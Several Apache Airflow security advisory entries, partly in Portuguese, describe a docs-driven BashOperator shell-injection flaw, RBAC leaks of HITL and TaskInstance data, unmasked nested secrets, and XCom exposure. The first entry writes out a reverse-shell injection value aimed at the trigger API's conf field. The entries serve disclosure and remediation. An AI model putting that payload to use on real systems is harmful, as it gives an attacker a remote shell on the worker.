Kevin Yang

Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash command="echo value: {{ dag run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.

**Nome do Software Vulnerável e Versões Afetadas** Airflow versões anteriores a 3.2.1 **Description** O endpoint autenticado '/ui/dags' não aplica o controle de acesso por DAG em registros incorporados de Human-in-the-Loop (HITL) e TaskInstance. Isso permite que um usuário logado com acesso de leitura a pelo menos um DAG recupere prompts HITL, incluindo seus parâmetros de solicitação, e detalhes completos de TaskInstance para DAGs fora de seu escopo autorizado. Como os prompts HITL e os campos de TaskInstance rotineiramente carregam parâmetros de operador e contexto de formulário livre anexados a uma tarefa, esse vazamento amplia a visibilidade dos dados de execução do DAG além do limite de RBAC (Controle de Acesso Baseado em Função) pretendido para cada usuário autenticado. **Recommendations** Atualizar para a versão 3.2.1.

**Name of the Vulnerable Software and Affected Versions** Apache Airflow (versões afetadas não especificadas) **Description** Um exemplo de BashOperator na documentação sugeriu um método de passagem de `dag run.conf` que permite o uso de entrada de usuário não sanitizada. Isso pode levar a uma escalada de privilégios onde um usuário da interface (UI) pode executar código no worker. **Recommendations** Revisar todos os DAGs para garantir que não adotaram a orientação incorreta da documentação em relação ao uso de `dag run.conf` no BashOperator.

**Name of the Vulnerable Software and Affected Versions** Apache Airflow versões anteriores a 3.2.0 **Description** Segredos armazenados em variáveis como dicionários JSON não são redigidos adequadamente. Quando um usuário recupera essas variáveis, os segredos localizados em campos aninhados não são mascarados. **Recommendations** Atualizar para a versão 3.2.0.

Name of the Vulnerable Software and Affected Versions Apache Airflow versions 3.0.0 through 3.1.8 Description O endpoint de espera DagRun no Apache Airflow permite que usuários com permissões de leitura do DAG Run, como a função Viewer, acessem valores de resultado XCom. Este comportamento contradiz o modelo de segurança pretendido, onde XCom é um recurso protegido e a função Viewer deve ser somente leitura. Recommendations Atualize para a versão 3.2.0 do Apache Airflow.